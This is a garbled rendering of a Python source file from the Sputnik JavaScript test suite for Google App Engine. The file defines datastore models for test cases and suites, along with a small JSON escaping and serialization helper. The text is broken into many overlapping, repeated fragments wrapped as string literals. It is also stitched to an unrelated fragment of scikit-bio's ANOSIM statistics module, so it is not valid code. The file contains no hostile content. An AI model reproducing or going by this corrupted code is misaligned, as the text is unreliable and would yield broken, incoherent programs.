from google.appengine.ext import db import cStringIO _ESCAPEES = {", "lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return", "suite, start, end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count", "= [] for c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee)", "if obj: return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name", "@staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial =", "to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial", "if t is dict: props = [ ] for (key, value) in obj.items():", "'\\t': '\\\\t' } def json_escape(s): result = [] for c in s: escapee", "if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c)", "serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query", "unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite,", "props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value)))", "def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND serial >=", "db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT 1\") return", "authors. All rights reserved. 
# This code is governed by the BSD license", "result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result)", ":1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model):", "= db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source':", "suite = :1 AND serial >= :2 AND serial < :3', suite, start,", "[] for c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif", "def json_escape(s): result = [] for c in s: escapee = _ESCAPEES.get(c, None)", "# This code is governed by the BSD license found in the LICENSE", "'0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source", "in obj]) elif t is bool: if obj: return '1' else: return '0'", ":3', suite, start, end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty()", "name = :1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count})", "t is bool: if obj: return '1' else: return '0' else: return to_json(obj.to_json())", "'[%s]' % ','.join([to_json(o) for o in obj]) elif t is bool: if obj:", "'\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def", "is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def", "class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial =", "All rights reserved. 
# This code is governed by the BSD license found", "'\\\\t' } def json_escape(s): result = [] for c in s: escapee =", "result = [] for c in s: escapee = _ESCAPEES.get(c, None) if escapee:", "t is dict: props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s'", "query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND", "or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return", "self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial':", "(t is str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t", "','.join([to_json(o) for o in obj]) elif t is bool: if obj: return '1'", "else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite =", "def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial = :2',", "'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND", "is str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t is", "serial): query = Case.gql('WHERE suite = :1 AND serial = :2', suite, serial)", "Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE", "{'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative,", "reserved. 
# This code is governed by the BSD license found in the", "value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t", "to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name,", "return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite =", "is long): return str(obj) elif (t is str) or (t is unicode): return", "= :1 AND serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite,", "} def json_escape(s): result = [] for c in s: escapee = _ESCAPEES.get(c,", "is unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' %", "def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial):", "#!/usr/bin/python # Copyright 2009 the Sputnik authors. All rights reserved. # This code", ":1 AND serial >= :2 AND serial < :3', suite, start, end) return", "LICENSE file. from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"',", "c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj):", "'1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite", "suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite", "elif t is bool: if obj: return '1' else: return '0' else: return", "rights reserved. 
# This code is governed by the BSD license found in", "' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t =", "def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self):", "the Sputnik authors. All rights reserved. # This code is governed by the", "is list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif t is", "{ '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r',", "self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite", "code is governed by the BSD license found in the LICENSE file. from", "file. from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\':", "= :1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class", "or (t is long): return str(obj) elif (t is str) or (t is", "@staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT 1\") return query.get()", "to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query", "'\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for", "t = type(obj) if t is dict: props = [ ] for (key,", "return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for", "serial >= :2 AND serial < :3', suite, start, end) return query.fetch(end -", "= :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query =", "= db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created", "'\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for c in s:", "serial < :3', suite, start, end) return query.fetch(end - start) class 
Suite(db.Model): name", "'\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s):", "is dict: props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' %", "'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get():", "start, end): query = Case.gql('WHERE suite = :1 AND serial >= :2 AND", "= db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name =", "bool: if obj: return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model):", "- start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite):", "escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\"", "'\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for c", "import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b',", "name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative", ":2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE", "source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name':", "@staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND serial", "db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative':", "lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial = :2', suite,", "] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' %", "start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() 
@staticmethod def lookup(suite): query", "% (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or (t", "o in obj]) elif t is bool: if obj: return '1' else: return", "Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty()", "query = Case.gql('WHERE suite = :1 AND serial = :2', suite, serial) return", "AND serial >= :2 AND serial < :3', suite, start, end) return query.fetch(end", "unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o)", "BSD license found in the LICENSE file. from google.appengine.ext import db import cStringIO", "= { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r':", "def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created", "Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER", "is int) or (t is long): return str(obj) elif (t is str) or", "= db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return", "\"\".join(result) def to_json(obj): t = type(obj) if t is dict: props = [", "return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty()", "2009 the Sputnik authors. All rights reserved. 
# This code is governed by", "long): return str(obj) elif (t is str) or (t is unicode): return '\"%s\"'", "db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f':", "Case.gql('WHERE suite = :1 AND serial >= :2 AND serial < :3', suite,", "','.join(props) elif (t is int) or (t is long): return str(obj) elif (t", "None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else:", "to_json(obj): t = type(obj) if t is dict: props = [ ] for", "by the BSD license found in the LICENSE file. from google.appengine.ext import db", "self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query", "in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < '", "list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif t is bool:", "= :1 AND serial >= :2 AND serial < :3', suite, start, end)", "for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props)", "self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1", "'\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for o", "def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name':", "Case.gql('WHERE suite = :1 AND serial = :2', suite, serial) return query.get() @staticmethod", "elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def", "return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty()", "= db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self):", "= 
Case.gql('WHERE suite = :1 AND serial >= :2 AND serial < :3',", "import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f',", "= db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT 1\")", "json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for o in obj])", "'\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = []", "db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)}", "end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty()", "db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return", "db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get()", "'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial})", "type(obj) if t is dict: props = [ ] for (key, value) in", "db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1',", "return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True)", "from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\',", "= db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self):", "int) or (t is long): return str(obj) elif (t is str) or (t", "current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER 
BY", "query = Case.gql('WHERE suite = :1 AND serial >= :2 AND serial <", "c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c <", "# Copyright 2009 the Sputnik authors. All rights reserved. # This code is", "is bool: if obj: return '1' else: return '0' else: return to_json(obj.to_json()) class", "'{%s}' % ','.join(props) elif (t is int) or (t is long): return str(obj)", "db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty()", "db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC", "(key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif", "else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source =", "self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod", "_ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c))", "str(obj) elif (t is str) or (t is unicode): return '\"%s\"' % json_escape(obj)", "return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1", "name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name", "% ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t", "query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def", "AND serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end):", "return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() 
@staticmethod", "self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial", "': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj)", "class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query =", "<reponame>marintsev/sputniktests #!/usr/bin/python # Copyright 2009 the Sputnik authors. All rights reserved. # This", "elif (t is int) or (t is long): return str(obj) elif (t is", "return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty()", "to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod", "json_escape(s): result = [] for c in s: escapee = _ESCAPEES.get(c, None) if", "result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t is dict: props", "the LICENSE file. from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"':", "= db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative =", "return \"\".join(result) def to_json(obj): t = type(obj) if t is dict: props =", "return str(obj) elif (t is str) or (t is unicode): return '\"%s\"' %", "license found in the LICENSE file. 
from google.appengine.ext import db import cStringIO _ESCAPEES", "cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n':", "obj: return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name =", "count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite)", "s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ':", "'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite =", "obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int)", "suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite", "return '[%s]' % ','.join([to_json(o) for o in obj]) elif t is bool: if", "= Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return to_json({'name': self.name,", "'\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t'", "for c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c", "% ','.join([to_json(o) for o in obj]) elif t is bool: if obj: return", "self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def", "Sputnik authors. All rights reserved. 
# This code is governed by the BSD", "end): query = Case.gql('WHERE suite = :1 AND serial >= :2 AND serial", "@staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get() def", "elif (t is str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif", "< :3', suite, start, end) return query.fetch(end - start) class Suite(db.Model): name =", "db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return", "created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT", "= _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" %", "% json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for o in", "'\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result", "serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative,", "(t is int) or (t is long): return str(obj) elif (t is str)", "start, end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count =", "'\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t':", "escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return", "the BSD license found in the LICENSE file. 
from google.appengine.ext import db import", "to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE", ">= :2 AND serial < :3', suite, start, end) return query.fetch(end - start)", "= type(obj) if t is dict: props = [ ] for (key, value)", "for o in obj]) elif t is bool: if obj: return '1' else:", "(t is unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]'", "elif (t is list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif", "to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or (t is long):", "This code is governed by the BSD license found in the LICENSE file.", "suite = :1 AND serial = :2', suite, serial) return query.get() @staticmethod def", "query = Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return to_json({'name':", ":1 AND serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start,", "class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query =", "'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def", "is governed by the BSD license found in the LICENSE file. from google.appengine.ext", "(json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or (t is", "serial) return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite =", "else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t is dict:", "< ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t", "props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or" ]
[ "setuptools import setup, find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers',", "from setuptools import setup, find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup(", "setup, find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming", "f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis',", "f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True, install_requires=", "as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image", "required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(),", "find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers", "= f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True,", "name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True, install_requires= required, )", "setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution Image Synthesis', packages=find_packages(), include_package_data=True, install_requires= required,", "import setup, 
find_packages with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden',", "with open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for", "open('requirements.txt') as f: required = f.read().splitlines() setup( name='taming-transformers', version='0.0.1-eden', description='Taming Transformers for High-Resolution" ]
[ "the grouping matrix. It is important to # extract the values in the", "return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B", "matrix where True means that the two objects are in the same #", "means that the two objects are in the same # group. This ufunc", "with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper", "interface are similar to ``vegan::anosim``, available in R's vegan package [2]_. References ----------", "algorithm and interface are similar to ``vegan::anosim``, available in R's vegan package [2]_.", "preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within", "from the grouping matrix. It is important to # extract the values in", "# ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as np from", "test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column)", "in the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import", "_run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create a", "random grouping. Notes ----- See [1]_ for the original ANOSIM reference. The general", "/usr/bin/env python # ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # #", "self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists", "different based on a categorical factor. 
The ranks of the distances in the", "._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM)", "column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(),", "same # group. This ufunc requires that grouping is a numeric vector (e.g.,", "\"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create a matrix where", "self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B =", "# ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # # Distributed under", "two or more groups of objects are significantly different based on a categorical", "__future__ import absolute_import, division, print_function import numpy as np from scipy.stats import rankdata", "column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) /", "import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis", "of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping", "objects are in the same # group. This ufunc requires that grouping is", "an R statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping), with", "rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of", "within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B - r_W)", "that the two objects are in the same # group. 
This ufunc requires", "-1 and +1).\"\"\" # Create a matrix where True means that the two", "short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def", "http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R", "that the distances are extracted # from the distance matrix (see self._ranked_dists). Extracting", "distance matrix are used to calculate an R statistic, which ranges between -1", "(anti-grouping) to +1 (strong grouping), with an R value of 0 indicating random", "<NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian journal of ecology", "Create a matrix where True means that the two objects are in the", "from __future__ import absolute_import, division, print_function import numpy as np from scipy.stats import", "the distance matrix are used to calculate an R statistic, which ranges between", "# from the distance matrix (see self._ranked_dists). Extracting the # upper triangle (excluding", "[1]_ for the original ANOSIM reference. The general algorithm and interface are similar", "= np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix. It is", "python # ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # # Distributed", "order that the distances are extracted # from the distance matrix (see self._ranked_dists).", "to ``vegan::anosim``, available in R's vegan package [2]_. References ---------- .. [1] <NAME>.", "- 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM", "are similar to ``vegan::anosim``, available in R's vegan package [2]_. 
References ---------- ..", "and +1).\"\"\" # Create a matrix where True means that the two objects", "grouping is a numeric vector (e.g., # it won't work with a grouping", "4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between", "1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R", "# # Distributed under the terms of the Modified BSD License. # #", "two objects are in the same # group. This ufunc requires that grouping", "the distances are extracted # from the distance matrix (see self._ranked_dists). Extracting the", "(c) 2013--, scikit-bio development team. # # Distributed under the terms of the", "the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri):", "license is in the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from", "= 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None):", "R's vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of", "(see self._ranked_dists). Extracting the # upper triangle (excluding the diagonal) preserves this order.", "grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri])", "tests whether two or more groups of objects are significantly different based on", "file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division,", "CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. 
